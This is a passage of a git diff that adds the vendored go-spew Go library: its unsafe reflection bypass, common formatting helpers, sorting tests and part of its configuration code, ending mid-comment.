which changed the format again to mirror + // the original format. Code in the init function updates these offsets + // as necessary. + offsetPtr = uintptr(ptrSize) + offsetScalar = uintptr(0) + offsetFlag = uintptr(ptrSize * 2) + + // flagKindWidth and flagKindShift indicate various bits that the + // reflect package uses internally to track kind information. + // + // flagRO indicates whether or not the value field of a reflect.Value is + // read-only. + // + // flagIndir indicates whether the value field of a reflect.Value is + // the actual data or a pointer to the data. + // + // These values are valid before golang commit 90a7c3c86944 which + // changed their positions. Code in the init function updates these + // flags as necessary. + flagKindWidth = uintptr(5) + flagKindShift = uintptr(flagKindWidth - 1) + flagRO = uintptr(1 << 0) + flagIndir = uintptr(1 << 1) +) + +func init() { + // Older versions of reflect.Value stored small integers directly in the + // ptr field (which is named val in the older versions). Versions + // between commits ecccf07e7f9d and 82f48826c6c7 added a new field named + // scalar for this purpose which unfortunately came before the flag + // field, so the offset of the flag field is different for those + // versions. + // + // This code constructs a new reflect.Value from a known small integer + // and checks if the size of the reflect.Value struct indicates it has + // the scalar field. When it does, the offsets are updated accordingly. + vv := reflect.ValueOf(0xf00) + if unsafe.Sizeof(vv) == (ptrSize * 4) { + offsetScalar = ptrSize * 2 + offsetFlag = ptrSize * 3 + } + + // Commit 90a7c3c86944 changed the flag positions such that the low + // order bits are the kind. This code extracts the kind from the flags + // field and ensures it's the correct type. When it's not, the flag + // order has been changed to the newer format, so the flags are updated + // accordingly. + upf := unsafe.Pointer(uintptr(unsafe.Pointer(&vv)) + offsetFlag) + upfv := *(*uintptr)(upf) + flagKindMask := uintptr((1<>flagKindShift != uintptr(reflect.Int) { + flagKindShift = 0 + flagRO = 1 << 5 + flagIndir = 1 << 6 + + // Commit adf9b30e5594 modified the flags to separate the + // flagRO flag into two bits which specifies whether or not the + // field is embedded. This causes flagIndir to move over a bit + // and means that flagRO is the combination of either of the + // original flagRO bit and the new bit. + // + // This code detects the change by extracting what used to be + // the indirect bit to ensure it's set. When it's not, the flag + // order has been changed to the newer format, so the flags are + // updated accordingly. + if upfv&flagIndir == 0 { + flagRO = 3 << 5 + flagIndir = 1 << 7 + } + } +} + +// unsafeReflectValue converts the passed reflect.Value into a one that bypasses +// the typical safety restrictions preventing access to unaddressable and +// unexported data. It works by digging the raw pointer to the underlying +// value out of the protected value and generating a new unprotected (unsafe) +// reflect.Value to it. +// +// This allows us to check for implementations of the Stringer and error +// interfaces to be used for pretty printing ordinarily unaddressable and +// inaccessible values such as unexported struct fields. +func unsafeReflectValue(v reflect.Value) (rv reflect.Value) { + indirects := 1 + vt := v.Type() + upv := unsafe.Pointer(uintptr(unsafe.Pointer(&v)) + offsetPtr) + rvf := *(*uintptr)(unsafe.Pointer(uintptr(unsafe.Pointer(&v)) + offsetFlag)) + if rvf&flagIndir != 0 { + vt = reflect.PtrTo(v.Type()) + indirects++ + } else if offsetScalar != 0 { + // The value is in the scalar field when it's not one of the + // reference types. + switch vt.Kind() { + case reflect.Uintptr: + case reflect.Chan: + case reflect.Func: + case reflect.Map: + case reflect.Ptr: + case reflect.UnsafePointer: + default: + upv = unsafe.Pointer(uintptr(unsafe.Pointer(&v)) + + offsetScalar) + } + } + + pv := reflect.NewAt(vt, upv) + rv = pv + for i := 0; i < indirects; i++ { + rv = rv.Elem() + } + return rv +} diff --git a/vendor/github.com/davecgh/go-spew/spew/bypasssafe.go b/vendor/github.com/davecgh/go-spew/spew/bypasssafe.go new file mode 100644 index 0000000000..1fe3cf3d5d --- /dev/null +++ b/vendor/github.com/davecgh/go-spew/spew/bypasssafe.go @@ -0,0 +1,38 @@ +// Copyright (c) 2015-2016 Dave Collins +// +// Permission to use, copy, modify, and distribute this software for any +// purpose with or without fee is hereby granted, provided that the above +// copyright notice and this permission notice appear in all copies. +// +// THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES +// WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF +// MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR +// ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES +// WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN +// ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF +// OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. + +// NOTE: Due to the following build constraints, this file will only be compiled +// when the code is running on Google App Engine, compiled by GopherJS, or +// "-tags safe" is added to the go build command line. The "disableunsafe" +// tag is deprecated and thus should not be used. +// +build js appengine safe disableunsafe + +package spew + +import "reflect" + +const ( + // UnsafeDisabled is a build-time constant which specifies whether or + // not access to the unsafe package is available. + UnsafeDisabled = true +) + +// unsafeReflectValue typically converts the passed reflect.Value into a one +// that bypasses the typical safety restrictions preventing access to +// unaddressable and unexported data. However, doing this relies on access to +// the unsafe package. This is a stub version which simply returns the passed +// reflect.Value when the unsafe package is not available. +func unsafeReflectValue(v reflect.Value) reflect.Value { + return v +} diff --git a/vendor/github.com/davecgh/go-spew/spew/common.go b/vendor/github.com/davecgh/go-spew/spew/common.go new file mode 100644 index 0000000000..7c519ff47a --- /dev/null +++ b/vendor/github.com/davecgh/go-spew/spew/common.go @@ -0,0 +1,341 @@ +/* + * Copyright (c) 2013-2016 Dave Collins + * + * Permission to use, copy, modify, and distribute this software for any + * purpose with or without fee is hereby granted, provided that the above + * copyright notice and this permission notice appear in all copies. + * + * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES + * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF + * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR + * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES + * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN + * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF + * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. + */ + +package spew + +import ( + "bytes" + "fmt" + "io" + "reflect" + "sort" + "strconv" +) + +// Some constants in the form of bytes to avoid string overhead. This mirrors +// the technique used in the fmt package. +var ( + panicBytes = []byte("(PANIC=") + plusBytes = []byte("+") + iBytes = []byte("i") + trueBytes = []byte("true") + falseBytes = []byte("false") + interfaceBytes = []byte("(interface {})") + commaNewlineBytes = []byte(",\n") + newlineBytes = []byte("\n") + openBraceBytes = []byte("{") + openBraceNewlineBytes = []byte("{\n") + closeBraceBytes = []byte("}") + asteriskBytes = []byte("*") + colonBytes = []byte(":") + colonSpaceBytes = []byte(": ") + openParenBytes = []byte("(") + closeParenBytes = []byte(")") + spaceBytes = []byte(" ") + pointerChainBytes = []byte("->") + nilAngleBytes = []byte("") + maxNewlineBytes = []byte("\n") + maxShortBytes = []byte("") + circularBytes = []byte("") + circularShortBytes = []byte("") + invalidAngleBytes = []byte("") + openBracketBytes = []byte("[") + closeBracketBytes = []byte("]") + percentBytes = []byte("%") + precisionBytes = []byte(".") + openAngleBytes = []byte("<") + closeAngleBytes = []byte(">") + openMapBytes = []byte("map[") + closeMapBytes = []byte("]") + lenEqualsBytes = []byte("len=") + capEqualsBytes = []byte("cap=") +) + +// hexDigits is used to map a decimal value to a hex digit. +var hexDigits = "0123456789abcdef" + +// catchPanic handles any panics that might occur during the handleMethods +// calls. +func catchPanic(w io.Writer, v reflect.Value) { + if err := recover(); err != nil { + w.Write(panicBytes) + fmt.Fprintf(w, "%v", err) + w.Write(closeParenBytes) + } +} + +// handleMethods attempts to call the Error and String methods on the underlying +// type the passed reflect.Value represents and outputes the result to Writer w. +// +// It handles panics in any called methods by catching and displaying the error +// as the formatted value. +func handleMethods(cs *ConfigState, w io.Writer, v reflect.Value) (handled bool) { + // We need an interface to check if the type implements the error or + // Stringer interface. However, the reflect package won't give us an + // interface on certain things like unexported struct fields in order + // to enforce visibility rules. We use unsafe, when it's available, + // to bypass these restrictions since this package does not mutate the + // values. + if !v.CanInterface() { + if UnsafeDisabled { + return false + } + + v = unsafeReflectValue(v) + } + + // Choose whether or not to do error and Stringer interface lookups against + // the base type or a pointer to the base type depending on settings. + // Technically calling one of these methods with a pointer receiver can + // mutate the value, however, types which choose to satisify an error or + // Stringer interface with a pointer receiver should not be mutating their + // state inside these interface methods. + if !cs.DisablePointerMethods && !UnsafeDisabled && !v.CanAddr() { + v = unsafeReflectValue(v) + } + if v.CanAddr() { + v = v.Addr() + } + + // Is it an error or Stringer? + switch iface := v.Interface().(type) { + case error: + defer catchPanic(w, v) + if cs.ContinueOnMethod { + w.Write(openParenBytes) + w.Write([]byte(iface.Error())) + w.Write(closeParenBytes) + w.Write(spaceBytes) + return false + } + + w.Write([]byte(iface.Error())) + return true + + case fmt.Stringer: + defer catchPanic(w, v) + if cs.ContinueOnMethod { + w.Write(openParenBytes) + w.Write([]byte(iface.String())) + w.Write(closeParenBytes) + w.Write(spaceBytes) + return false + } + w.Write([]byte(iface.String())) + return true + } + return false +} + +// printBool outputs a boolean value as true or false to Writer w. +func printBool(w io.Writer, val bool) { + if val { + w.Write(trueBytes) + } else { + w.Write(falseBytes) + } +} + +// printInt outputs a signed integer value to Writer w. +func printInt(w io.Writer, val int64, base int) { + w.Write([]byte(strconv.FormatInt(val, base))) +} + +// printUint outputs an unsigned integer value to Writer w. +func printUint(w io.Writer, val uint64, base int) { + w.Write([]byte(strconv.FormatUint(val, base))) +} + +// printFloat outputs a floating point value using the specified precision, +// which is expected to be 32 or 64bit, to Writer w. +func printFloat(w io.Writer, val float64, precision int) { + w.Write([]byte(strconv.FormatFloat(val, 'g', -1, precision))) +} + +// printComplex outputs a complex value using the specified float precision +// for the real and imaginary parts to Writer w. +func printComplex(w io.Writer, c complex128, floatPrecision int) { + r := real(c) + w.Write(openParenBytes) + w.Write([]byte(strconv.FormatFloat(r, 'g', -1, floatPrecision))) + i := imag(c) + if i >= 0 { + w.Write(plusBytes) + } + w.Write([]byte(strconv.FormatFloat(i, 'g', -1, floatPrecision))) + w.Write(iBytes) + w.Write(closeParenBytes) +} + +// printHexPtr outputs a uintptr formatted as hexidecimal with a leading '0x' +// prefix to Writer w. +func printHexPtr(w io.Writer, p uintptr) { + // Null pointer. + num := uint64(p) + if num == 0 { + w.Write(nilAngleBytes) + return + } + + // Max uint64 is 16 bytes in hex + 2 bytes for '0x' prefix + buf := make([]byte, 18) + + // It's simpler to construct the hex string right to left. + base := uint64(16) + i := len(buf) - 1 + for num >= base { + buf[i] = hexDigits[num%base] + num /= base + i-- + } + buf[i] = hexDigits[num] + + // Add '0x' prefix. + i-- + buf[i] = 'x' + i-- + buf[i] = '0' + + // Strip unused leading bytes. + buf = buf[i:] + w.Write(buf) +} + +// valuesSorter implements sort.Interface to allow a slice of reflect.Value +// elements to be sorted. +type valuesSorter struct { + values []reflect.Value + strings []string // either nil or same len and values + cs *ConfigState +} + +// newValuesSorter initializes a valuesSorter instance, which holds a set of +// surrogate keys on which the data should be sorted. It uses flags in +// ConfigState to decide if and how to populate those surrogate keys. +func newValuesSorter(values []reflect.Value, cs *ConfigState) sort.Interface { + vs := &valuesSorter{values: values, cs: cs} + if canSortSimply(vs.values[0].Kind()) { + return vs + } + if !cs.DisableMethods { + vs.strings = make([]string, len(values)) + for i := range vs.values { + b := bytes.Buffer{} + if !handleMethods(cs, &b, vs.values[i]) { + vs.strings = nil + break + } + vs.strings[i] = b.String() + } + } + if vs.strings == nil && cs.SpewKeys { + vs.strings = make([]string, len(values)) + for i := range vs.values { + vs.strings[i] = Sprintf("%#v", vs.values[i].Interface()) + } + } + return vs +} + +// canSortSimply tests whether a reflect.Kind is a primitive that can be sorted +// directly, or whether it should be considered for sorting by surrogate keys +// (if the ConfigState allows it). +func canSortSimply(kind reflect.Kind) bool { + // This switch parallels valueSortLess, except for the default case. + switch kind { + case reflect.Bool: + return true + case reflect.Int8, reflect.Int16, reflect.Int32, reflect.Int64, reflect.Int: + return true + case reflect.Uint8, reflect.Uint16, reflect.Uint32, reflect.Uint64, reflect.Uint: + return true + case reflect.Float32, reflect.Float64: + return true + case reflect.String: + return true + case reflect.Uintptr: + return true + case reflect.Array: + return true + } + return false +} + +// Len returns the number of values in the slice. It is part of the +// sort.Interface implementation. +func (s *valuesSorter) Len() int { + return len(s.values) +} + +// Swap swaps the values at the passed indices. It is part of the +// sort.Interface implementation. +func (s *valuesSorter) Swap(i, j int) { + s.values[i], s.values[j] = s.values[j], s.values[i] + if s.strings != nil { + s.strings[i], s.strings[j] = s.strings[j], s.strings[i] + } +} + +// valueSortLess returns whether the first value should sort before the second +// value. It is used by valueSorter.Less as part of the sort.Interface +// implementation. +func valueSortLess(a, b reflect.Value) bool { + switch a.Kind() { + case reflect.Bool: + return !a.Bool() && b.Bool() + case reflect.Int8, reflect.Int16, reflect.Int32, reflect.Int64, reflect.Int: + return a.Int() < b.Int() + case reflect.Uint8, reflect.Uint16, reflect.Uint32, reflect.Uint64, reflect.Uint: + return a.Uint() < b.Uint() + case reflect.Float32, reflect.Float64: + return a.Float() < b.Float() + case reflect.String: + return a.String() < b.String() + case reflect.Uintptr: + return a.Uint() < b.Uint() + case reflect.Array: + // Compare the contents of both arrays. + l := a.Len() + for i := 0; i < l; i++ { + av := a.Index(i) + bv := b.Index(i) + if av.Interface() == bv.Interface() { + continue + } + return valueSortLess(av, bv) + } + } + return a.String() < b.String() +} + +// Less returns whether the value at index i should sort before the +// value at index j. It is part of the sort.Interface implementation. +func (s *valuesSorter) Less(i, j int) bool { + if s.strings == nil { + return valueSortLess(s.values[i], s.values[j]) + } + return s.strings[i] < s.strings[j] +} + +// sortValues is a sort function that handles both native types and any type that +// can be converted to error or Stringer. Other inputs are sorted according to +// their Value.String() value to ensure display stability. +func sortValues(values []reflect.Value, cs *ConfigState) { + if len(values) == 0 { + return + } + sort.Sort(newValuesSorter(values, cs)) +} diff --git a/vendor/github.com/davecgh/go-spew/spew/common_test.go b/vendor/github.com/davecgh/go-spew/spew/common_test.go new file mode 100644 index 0000000000..0f5ce47dca --- /dev/null +++ b/vendor/github.com/davecgh/go-spew/spew/common_test.go @@ -0,0 +1,298 @@ +/* + * Copyright (c) 2013-2016 Dave Collins + * + * Permission to use, copy, modify, and distribute this software for any + * purpose with or without fee is hereby granted, provided that the above + * copyright notice and this permission notice appear in all copies. + * + * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES + * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF + * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR + * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES + * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN + * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF + * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. + */ + +package spew_test + +import ( + "fmt" + "reflect" + "testing" + + "github.com/davecgh/go-spew/spew" +) + +// custom type to test Stinger interface on non-pointer receiver. +type stringer string + +// String implements the Stringer interface for testing invocation of custom +// stringers on types with non-pointer receivers. +func (s stringer) String() string { + return "stringer " + string(s) +} + +// custom type to test Stinger interface on pointer receiver. +type pstringer string + +// String implements the Stringer interface for testing invocation of custom +// stringers on types with only pointer receivers. +func (s *pstringer) String() string { + return "stringer " + string(*s) +} + +// xref1 and xref2 are cross referencing structs for testing circular reference +// detection. +type xref1 struct { + ps2 *xref2 +} +type xref2 struct { + ps1 *xref1 +} + +// indirCir1, indirCir2, and indirCir3 are used to generate an indirect circular +// reference for testing detection. +type indirCir1 struct { + ps2 *indirCir2 +} +type indirCir2 struct { + ps3 *indirCir3 +} +type indirCir3 struct { + ps1 *indirCir1 +} + +// embed is used to test embedded structures. +type embed struct { + a string +} + +// embedwrap is used to test embedded structures. +type embedwrap struct { + *embed + e *embed +} + +// panicer is used to intentionally cause a panic for testing spew properly +// handles them +type panicer int + +func (p panicer) String() string { + panic("test panic") +} + +// customError is used to test custom error interface invocation. +type customError int + +func (e customError) Error() string { + return fmt.Sprintf("error: %d", int(e)) +} + +// stringizeWants converts a slice of wanted test output into a format suitable +// for a test error message. +func stringizeWants(wants []string) string { + s := "" + for i, want := range wants { + if i > 0 { + s += fmt.Sprintf("want%d: %s", i+1, want) + } else { + s += "want: " + want + } + } + return s +} + +// testFailed returns whether or not a test failed by checking if the result +// of the test is in the slice of wanted strings. +func testFailed(result string, wants []string) bool { + for _, want := range wants { + if result == want { + return false + } + } + return true +} + +type sortableStruct struct { + x int +} + +func (ss sortableStruct) String() string { + return fmt.Sprintf("ss.%d", ss.x) +} + +type unsortableStruct struct { + x int +} + +type sortTestCase struct { + input []reflect.Value + expected []reflect.Value +} + +func helpTestSortValues(tests []sortTestCase, cs *spew.ConfigState, t *testing.T) { + getInterfaces := func(values []reflect.Value) []interface{} { + interfaces := []interface{}{} + for _, v := range values { + interfaces = append(interfaces, v.Interface()) + } + return interfaces + } + + for _, test := range tests { + spew.SortValues(test.input, cs) + // reflect.DeepEqual cannot really make sense of reflect.Value, + // probably because of all the pointer tricks. For instance, + // v(2.0) != v(2.0) on a 32-bits system. Turn them into interface{} + // instead. + input := getInterfaces(test.input) + expected := getInterfaces(test.expected) + if !reflect.DeepEqual(input, expected) { + t.Errorf("Sort mismatch:\n %v != %v", input, expected) + } + } +} + +// TestSortValues ensures the sort functionality for relect.Value based sorting +// works as intended. +func TestSortValues(t *testing.T) { + v := reflect.ValueOf + + a := v("a") + b := v("b") + c := v("c") + embedA := v(embed{"a"}) + embedB := v(embed{"b"}) + embedC := v(embed{"c"}) + tests := []sortTestCase{ + // No values. + { + []reflect.Value{}, + []reflect.Value{}, + }, + // Bools. + { + []reflect.Value{v(false), v(true), v(false)}, + []reflect.Value{v(false), v(false), v(true)}, + }, + // Ints. + { + []reflect.Value{v(2), v(1), v(3)}, + []reflect.Value{v(1), v(2), v(3)}, + }, + // Uints. + { + []reflect.Value{v(uint8(2)), v(uint8(1)), v(uint8(3))}, + []reflect.Value{v(uint8(1)), v(uint8(2)), v(uint8(3))}, + }, + // Floats. + { + []reflect.Value{v(2.0), v(1.0), v(3.0)}, + []reflect.Value{v(1.0), v(2.0), v(3.0)}, + }, + // Strings. + { + []reflect.Value{b, a, c}, + []reflect.Value{a, b, c}, + }, + // Array + { + []reflect.Value{v([3]int{3, 2, 1}), v([3]int{1, 3, 2}), v([3]int{1, 2, 3})}, + []reflect.Value{v([3]int{1, 2, 3}), v([3]int{1, 3, 2}), v([3]int{3, 2, 1})}, + }, + // Uintptrs. + { + []reflect.Value{v(uintptr(2)), v(uintptr(1)), v(uintptr(3))}, + []reflect.Value{v(uintptr(1)), v(uintptr(2)), v(uintptr(3))}, + }, + // SortableStructs. + { + // Note: not sorted - DisableMethods is set. + []reflect.Value{v(sortableStruct{2}), v(sortableStruct{1}), v(sortableStruct{3})}, + []reflect.Value{v(sortableStruct{2}), v(sortableStruct{1}), v(sortableStruct{3})}, + }, + // UnsortableStructs. + { + // Note: not sorted - SpewKeys is false. + []reflect.Value{v(unsortableStruct{2}), v(unsortableStruct{1}), v(unsortableStruct{3})}, + []reflect.Value{v(unsortableStruct{2}), v(unsortableStruct{1}), v(unsortableStruct{3})}, + }, + // Invalid. + { + []reflect.Value{embedB, embedA, embedC}, + []reflect.Value{embedB, embedA, embedC}, + }, + } + cs := spew.ConfigState{DisableMethods: true, SpewKeys: false} + helpTestSortValues(tests, &cs, t) +} + +// TestSortValuesWithMethods ensures the sort functionality for relect.Value +// based sorting works as intended when using string methods. +func TestSortValuesWithMethods(t *testing.T) { + v := reflect.ValueOf + + a := v("a") + b := v("b") + c := v("c") + tests := []sortTestCase{ + // Ints. + { + []reflect.Value{v(2), v(1), v(3)}, + []reflect.Value{v(1), v(2), v(3)}, + }, + // Strings. + { + []reflect.Value{b, a, c}, + []reflect.Value{a, b, c}, + }, + // SortableStructs. + { + []reflect.Value{v(sortableStruct{2}), v(sortableStruct{1}), v(sortableStruct{3})}, + []reflect.Value{v(sortableStruct{1}), v(sortableStruct{2}), v(sortableStruct{3})}, + }, + // UnsortableStructs. + { + // Note: not sorted - SpewKeys is false. + []reflect.Value{v(unsortableStruct{2}), v(unsortableStruct{1}), v(unsortableStruct{3})}, + []reflect.Value{v(unsortableStruct{2}), v(unsortableStruct{1}), v(unsortableStruct{3})}, + }, + } + cs := spew.ConfigState{DisableMethods: false, SpewKeys: false} + helpTestSortValues(tests, &cs, t) +} + +// TestSortValuesWithSpew ensures the sort functionality for relect.Value +// based sorting works as intended when using spew to stringify keys. +func TestSortValuesWithSpew(t *testing.T) { + v := reflect.ValueOf + + a := v("a") + b := v("b") + c := v("c") + tests := []sortTestCase{ + // Ints. + { + []reflect.Value{v(2), v(1), v(3)}, + []reflect.Value{v(1), v(2), v(3)}, + }, + // Strings. + { + []reflect.Value{b, a, c}, + []reflect.Value{a, b, c}, + }, + // SortableStructs. + { + []reflect.Value{v(sortableStruct{2}), v(sortableStruct{1}), v(sortableStruct{3})}, + []reflect.Value{v(sortableStruct{1}), v(sortableStruct{2}), v(sortableStruct{3})}, + }, + // UnsortableStructs. + { + []reflect.Value{v(unsortableStruct{2}), v(unsortableStruct{1}), v(unsortableStruct{3})}, + []reflect.Value{v(unsortableStruct{1}), v(unsortableStruct{2}), v(unsortableStruct{3})}, + }, + } + cs := spew.ConfigState{DisableMethods: true, SpewKeys: true} + helpTestSortValues(tests, &cs, t) +} diff --git a/vendor/github.com/davecgh/go-spew/spew/config.go b/vendor/github.com/davecgh/go-spew/spew/config.go new file mode 100644 index 0000000000..2e3d22f312 --- /dev/null +++ b/vendor/github.com/davecgh/go-spew/spew/config.go @@ -0,0 +1,306 @@ +/* + * Copyright (c) 2013-2016 Dave Collins + * + * Permission to use, copy, modify, and distribute this software for any + * purpose with or without fee is hereby granted, provided that the above + * copyright notice and this permission notice appear in all copies. + * + * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES + * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF + * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR + * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES + * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN + * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF + * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. + */ + +package spew + +import ( + "bytes" + "fmt" + "io" + "os" +) + +// ConfigState houses the configuration options used by spew to format and +// display values. There is a global instance, Config, that is used to control +// all top-level Formatter and Dump functionality. Each ConfigState instance +// provides methods equivalent to the top-level functions. +// +// The zero value for ConfigState provides no indentation. You would typically +// want to set it to a space or a tab. +// +// Alternatively, you can use NewDefaultConfig to get a ConfigState instance +// with default settings. See the documentation of NewDefaultConfig for default +// values. +type ConfigState struct { + // Indent specifies the string to use for each indentation level. The + // global config instance that all top-level functions use set this to a + // single space by default. If you would like more indentation, you might + // set this to a tab with "\t" or perhaps two spaces with " ". + Indent string + + // MaxDepth controls the maximum number of levels to descend into nested + // data structures. The default, 0, means there is no limit. + // + // NOTE: Circular data structures are properly detected, so it is not + // necessary to set this value unless you specifically want to limit deeply + // nested data structures. + MaxDepth int + + // DisableMethods specifies whether or not error and Stringer interfaces are + // invoked for types that implement them. + DisableMethods bool + + // DisablePointerMethods specifies whether or not to check for and invoke + // error and Stringer interfaces on types which only accept a pointer + // receiver when the current type is not a pointer. + // + // NOTE: This might be an unsafe action since calling one of these methods + // with a pointer receiver could technically mutate the value, however, + // in practice, types which choose to satisify an error or Stringer + // interface with a pointer receiver should not be mutating their state + // inside these interface methods. As a result, this option relies on + // access to the unsafe package, so it will not have any effect when + // running in environments without access to the unsafe package such as + // Google App Engine or with the "safe" build tag specified. + DisablePointerMethods bool + + // DisablePointerAddresses specifies whether to disable the printing of + // pointer addresses. This is useful when diffing data structures in tests. + DisablePointerAddresses bool + + // DisableCapacities specifies whether to disable the printing of capacities + // for arrays, slices, maps and channels. This is useful when diffing + // data structures in tests. + DisableCapacities bool + + // ContinueOnMethod specifies whether or not recursion should continue once + // a custom error or Stringer interface is invoked. The default, false, + // means it will print the results of invoking the custom error or Stringer + // interface and return immediately instead of continuing to recurse into + // the internals of the data type. + // + // NOTE: This flag does not have any effect if method invocation is disabled + // via the DisableMethods or DisablePointerMethods options. + ContinueOnMethod bool + + // SortKeys specifies map keys should be sorted before being printed. Use + // this to have a more deterministic, diffable output. Note that only + // native types (bool, int, uint, floats, uintptr and string) and types + // that support the error or Stringer interfaces (if methods are + // enabled) are supported, with other types sorted according to the + // reflect.Value.String() output which guarantees display stability. + SortKeys bool + + // SpewKeys specifies that, as a last resort attempt, map keys should + // be spewed to strings and sorted by those strings. This is only + // considered if SortKeys is true. + SpewKeys bool +} + +// Config is the active configuration of the top-level functions. +// The configuration can be changed by modifying the contents of spew.Config. +var Config = ConfigState{Indent: " "} + +// Errorf is a wrapper for fmt.Errorf that treats each argument as if it were +// passed with a Formatter interface returned by c.NewFormatter. It returns +// the formatted string as a value that satisfies error. See NewFormatter +// for formatting details. +// +// This function is shorthand for the following syntax: +// +// fmt.Errorf(format, c.NewFormatter(a), c.NewFormatter(b)) +func (c *ConfigState) Errorf(format string, a ...interface{}) (err error) { + return fmt.Errorf(format, c.convertArgs(a)...) +} + +// Fprint is a wrapper for fmt.Fprint that treats each argument as if it were +// passed with a Formatter interface returned by c.NewFormatter. It returns +// the number of bytes written and any write error encountered. See +// NewFormatter for formatting details. +// +// This function is shorthand for the following syntax: +// +// fmt.Fprint(w, c.NewFormatter(a), c.NewFormatter(b)) +func (c *ConfigState) Fprint(w io.Writer, a ...interface{}) (n int, err error) { + return fmt.Fprint(w, c.convertArgs(a)...) +} + +// Fprintf is a wrapper for fmt.Fprintf that treats each argument as if it were +// passed with a Formatter interface returned by c.NewFormatter. It returns +// the number of bytes written and any write error encountered. See +// NewFormatter for formatting details. +// +// This function is shorthand for the following syntax: +// +// fmt.Fprintf(w, format, c.NewFormatter(a), c.NewFormatter(b)) +func (c *ConfigState) Fprintf(w io.Writer, format string, a ...interface{}) (n int, err error) { + return fmt.Fprintf(w, format, c.convertArgs(a)...) +} + +// Fprintln is a wrapper for fmt.Fprintln that treats each argument as if it +// passed with a Formatter interface returned by c.NewFormatter. See +// NewFormatter for formatting details. +// +// This function is shorthand for the following syntax: +// +// fmt.Fprintln(w, c.NewFormatter(a), c.NewFormatter(b)) +func (c *ConfigState) Fprintln(w io.Writer, a ...interface{}) (n int, err error) { + return fmt.Fprintln(w, c.convertArgs(a)...) +} + +// Print is a wrapper for fmt.Print that treats each argument as if it were +// passed with a Formatter interface returned by c.NewFormatter. It returns +// the number of bytes written and any write error encountered. See +// NewFormatter for formatting details. +// +// This function is shorthand for the following syntax: +// +// fmt.Print(c.NewFormatter(a), c.NewFormatter(b)) +func (c *ConfigState) Print(a ...interface{}) (n int, err error) { + return fmt.Print(c.convertArgs(a)...) +} + +// Printf is a wrapper for fmt.Printf that treats each argument as if it were +// passed with a Formatter interface returned by c.NewFormatter. It returns +// the number of bytes written and any write error encountered. See +// NewFormatter for formatting details. +// +// This function is shorthand for the following syntax: +// +// fmt.Printf(format, c.NewFormatter(a), c.NewFormatter(b)) +func (c *ConfigState) Printf(format string, a ...interface{}) (n int, err error) { + return fmt.Printf(format, c.convertArgs(a)...) +} + +// Println is a wrapper for fmt.Println that treats each argument as if it were +// passed with a Formatter interface returned by c.NewFormatter. It returns +// the number of bytes written and any write error encountered. See +// NewFormatter for formatting details. +// +// This function is shorthand for the following syntax: +// +// fmt.Println(c.NewFormatter(a), c.NewFormatter(b)) +func (c *ConfigState) Println(a ...interface{}) (n int, err error) { + return fmt.Println(c.convertArgs(a)...) +} + +// Sprint is a wrapper for fmt.Sprint that treats each argument as if it were +// passed with a Formatter interface returned by c.NewFormatter. It returns +// the resulting string. See NewFormatter for formatting details. +// +// This function is shorthand for the following syntax: +// +// fmt.Sprint(c.NewFormatter(a), c.NewFormatter(b)) +func (c *ConfigState) Sprint(a ...interface{}) string { + return fmt.Sprint(c.convertArgs(a)...) +} + +// Sprintf is a wrapper for fmt.Sprintf that treats each argument as if it were +// passed with a Formatter interface returned by c.NewFormatter. It returns +// the resulting string. See NewFormatter for formatting details. +// +// This function is shorthand for the following syntax: +// +// fmt.Sprintf(format, c.NewFormatter(a), c.NewFormatter(b)) +func (c *ConfigState) Sprintf(format string, a ...interface{}) string { + return fmt.Sprintf(format, c.convertArgs(a)...) +} + +// Sprintln is a wrapper for fmt.Sprintln that treats each argument as if it +// were passed with a Formatter interface returned by c.NewFormatter. It +// returns the resulting string. See NewFormatter for formatting details. +// +// This function is shorthand for the following syntax: +// +// fmt.Sprintln(c.NewFormatter(a), c.NewFormatter(b)) +func (c *ConfigState) Sprintln(a ...interface{}) string { + return fmt.Sprintln(c.convertArgs(a)...) +} + +/* +NewFormatter returns a custom formatter that satisfies the fmt.Formatter +interface. As a result, it integrates cleanly with standard fmt package +printing functions. The formatter is useful for inline printing of smaller data +types similar to the standard %v format specifier. + +The custom formatter only responds to the %v (most compact), %+v (adds pointer +addresses), %#v (adds types), and %#+v (adds types and pointer addresses) 